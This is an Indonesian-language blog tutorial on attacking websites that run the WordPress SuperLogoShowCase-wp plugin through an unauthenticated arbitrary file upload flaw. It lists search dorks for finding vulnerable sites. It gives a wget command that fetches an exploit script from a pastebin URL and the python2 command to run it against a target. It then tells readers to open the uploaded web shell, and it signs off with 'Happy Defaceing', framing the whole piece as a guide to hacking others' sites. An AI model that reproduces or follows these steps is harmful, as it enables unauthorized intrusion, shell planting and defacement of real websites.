Menu

WordPress SuperLogoShowCase-wp Plugins - Unauthenticated Arbitrary File Upload

WordPress SuperLogoShowCase-wp Plugins - Unauthenticated Arbitrary File Upload


Hallo kawan kawan kembali lagi sama saya oke pada pertemuan kali ini saya akan memberikan sebuah tutorial bagaimana cara memanfaatkan bug SuperLogoShowCase pada plugins website .. nah teknik ini sama seperti di artikel sebelumnya yaitu pada plugins SuperStoreFinder

Oke kita lanjut... tahap nya juga sama seperti yang pada artikelnya sebelumnya

awal awal yang kalian harus lakukan yaitu mencari site yang sekiranya lemah menggunakan dork? apa dorknya mas?...

Dork : "SuperLogoShowCase-wp"
            "inurl:/wp-content/plugins/plugins/superlogoshowcase-wp/"

selebihnya your brain :v

Sebelum mengeksekusi Site kita akan mendownload tools nya terlebih dauhlu saya akan membakian source code dibawah ini ... 

kalian install di termux atau terminal dengan command

wget https://pastebin.com/raw/pMuFWLLm -O exploit.py


Berhubungan ini tools menggunakan bahasa python maka kita akan memberikan format .py yang wajib digunakan disetipan file python

oke sekarang kita mulai exploitasi dengan menggunakan python2

python2 exploit.py https://target.com/



Disini kita hanya memasukan site target tanpa path , karna path sudah otomatis ter detect di dalam tools nya secara default , maka dari itu kalian hanya memasukan site targetnya saja ...

seperti yang terlihat di gambar di atas kalian pilih opsi nomor 0 karna yg kita targetkan yaitu bug superlogoshowcase-wp nya :) 

dan jika vuln / ter upload shel nya akan seperti ini ... contoh gambar dibawah


anddd!!! kalian akses shellnya :D


Oke Happy Defaceing :D sampai jumpa and next materiii :D

Thanks To S4ndal.py 

Iklan Tengah Post

Ads middle content1

Ads middle content2